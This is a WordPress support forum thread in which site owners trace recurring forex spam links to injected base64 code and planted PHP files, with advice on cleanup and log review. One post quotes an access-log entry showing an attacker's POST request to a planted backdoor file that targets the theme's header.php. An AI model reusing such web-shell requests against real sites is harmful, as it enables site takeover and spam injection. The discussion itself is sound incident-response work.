WordPress.org

Ready to get started?Download WordPress

Forums

Hacked: I can't find these Spam links anywhere? Plus more spam advice? (17 posts)

  1. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    OK...I just keep getting pummeled by spam links. Usually in the footer, but this is new. If you view my source code on http://www.rvoodoo.com Just after the opening body tag, you will see a bunch of links to forex stuff. Thing is, I can't find that anywhere? Any ideas where it's coming from? I've looked at my header file where that would be situated, nothing there. I've turned off all plugins and refreshed browser, hidden links are still there. I have all fresh WP files, and the date stamps are all in check (except my wp-config file was hit yesterday, but that's clean now).

    And on the spam topic, I've followed a bunch of the posts on here, I'm running 2.8.4, since it was released. I changed all passwords. No hidden admin users in the sql db. My theme files (at least the ones being written to) are read only, and clean. I've done a full fresh WP install, reuploaded all fresh plugins, scanned my sql db for base64 and other things and cleaned them....Am I missing something? I still keep coming back to footer spam every day.

    I think this is the first time I've had to come on here and beg for some help, I usually google myself to death to find my answers.....but I'm plain stumped this time.....

  2. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    OK, I finally found the code that was sticking that spam near my header.

    But with that outta the way, can anyone see anything I missed in cleaning my WP install? This is kinda drivin me nuts

  3. bottleneck
    Member
    Posted 4 years ago #

    IMHO, it seems to me as brute force password discovery.

    Make sure that you don't use "admin" as your username.

    Also, just in case, check this out 20+ Powerful WordPress Security Plugins and Some Tips and Tricks

  4. sisconda
    Member
    Posted 4 years ago #

    If you don't mind me asking, where did you go to remove the forex links. The exact same thing has happened to a blog of mine. Thanks!

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    I don't use admin, and I've changed my passwords.... all using mixed case and numbers combined.....

    @sisconda.....I'm not 100% sure which trick worked. What I've done today is scan every php file I have. in my main WP directory was an index.php that had nasty stuff in it.

    BUT....I spent about 8hrs today going through all 4 of my WP installs, along with every website I have (9 I think), every php file on every website had a base64 decode inserted at the top of it.

    I really hope I got it all this time

  6. Samuel B
    moderator
    Posted 4 years ago #

    to be sure you should export your database and do a search on the .sql file with notepad for "forex", "eval", "Base", etc.

  7. sisconda
    Member
    Posted 4 years ago #

    Ahh thanks, I'll go take a look through all the files then. I noticed the base64 decode function on the top of a lot of the pages, but I wasn't sure if it had some built in information that WordPress needed.

    The funny thing is, I wouldn't even have found any of it but it looks like it has a misplaced semicolon in it which broke some of my js functions.

    Thanks again!

  8. lukeodom
    Member
    Posted 4 years ago #

    Same thing just happened to my site. Latest version of wordpress. Don't use admin. Do I just remove the base64 from the top of my php files? How do I keep it from happening again?

  9. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    well...I just finished up. I had forgotten about replacing all the plugins on some of my other wordpress installs. Theres literally a couple thousand php files I had to work on between yesterday and today. I replaced most of them, and some just hand removed the offending base64 junk. I had to guess on a lot of the php files, which I could replace and which I had to edit. I think I got everything right except maybe my zencart shop.....which doesn't seem to be totally working properly....

    @lukeodom, you can delete the entire base64 funtion....I forget what it looks like but its insid <> brackets. It's probably a pretty big paragraph, delete the whole thing, just be sure not to get any part of the next function......

    To keep it from happening again, you need to clean everything, change all your passwords, upgrade any WP installs to latest, etc. There are quite a few posts in the forums about dealing with hacked WP installs, thats what I referenced.

  10. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    OK, I think I figured out my situation. Since I had been using the latest version of WP I was really stumped. Then I started digging into the forums of the other software I use, and stumbled on a discussion on the simplemachines.org forum, which is the forum software I use. Seems a lot of users over there had the base64_decode show up on ALL their php files just like I did. They tracked it down to a user with the name krisbarteo. I checked out my forum, and sure enough, I had that user. So I'm not even sure my problems stem from WP.

    Just to be sure, I followed the advice given for both WP, and SimpleMachines....hopefully both are safe for now....

  11. bottleneck
    Member
    Posted 4 years ago #

    Sorry to hear this...

    did you scan your local machine?

  12. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Yup...its actually a really fresh reformat.....so super clean machine. Scanned again last night. Is clean

  13. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    damn, had to unresolve this topic, cuz the footer spam is back.

    None of my other php files are hit this time, just the footer. My host says it is a compromised FTP password. But....I changed that, then cleaned everything, and changed it again. I don't see how that can be the issue

  14. whooami
    Member
    Posted 4 years ago #

    I don't see how that can be the issue

    of course you dont -- im not surprised.

    Does your host offer ftp logs? before uploading a bunch of files on your own IP, take a look at the FTP logs.

  15. burzyn
    Member
    Posted 4 years ago #

    RVoodoo, i have the same problem. Could you tell me
    where can i find this spam code in my wordpress files?

  16. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    like I said above, all my php files had base_64 inserted into them, also, I found 2 php files that were not part of any software I was using.

    If you find anything in WP php files that uses base64 decode commands, I'd be really suspicious of it.

    If you have stuff like that, you'll most likely need a full reinstall like I did

  17. Gonebeta
    Member
    Posted 4 years ago #

    Hey Guys! I had the same problem for 2 months!

    Did everything suggested but the idiots kept coming back. Thank God for Whooami who suggested looking at ftp log! Well ...I didn't find anything in the ftp log... but behold! they were all in my access log!

    This is how I found him: I opened my access log for the day( opened it in wordpad) and did a search for header.php ( in your case you should search for footer.php). I found only two ip addresses accessed that file in the last two hours. Here is what it looks like
    ……………..
    66.36.246.108 - - [27/Dec/2009:14:48:34 -0500] "POST /wp-content/uploads/2007/03/wp-inclode.php?f=/homepages/18/ddd/htdocs/mydomain name/wp-content/themes/my theme name/header.php HTTP/1.1" 200 133 http://www.mydomain.com "-" "-" "-"

    They uploaded two files 4 months ago : wp-inclode.php and fotter.php with some codes.

    I went back and check the access log for the last two days and found the same pattern ( with different IP) always looking for the same files. The time of access corresponds to the time the links show up on my site( about every 4 hours).

    Funny thing is that after they inject the code, the same ip address comes back as a google bot to check if it is working.

    66.36.246.108 - - [27/Dec/2009:14:48:39 -0500] "GET / HTTP/1.1" 200 41547 http://www.mydomainname .com "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

    Bottom line, search for the file name in your access log, find the path to the rouge files and delete them!

    hope that help!

    p.s. Sorry for my bad English

Topic Closed

This topic has been closed to new replies.

About this Topic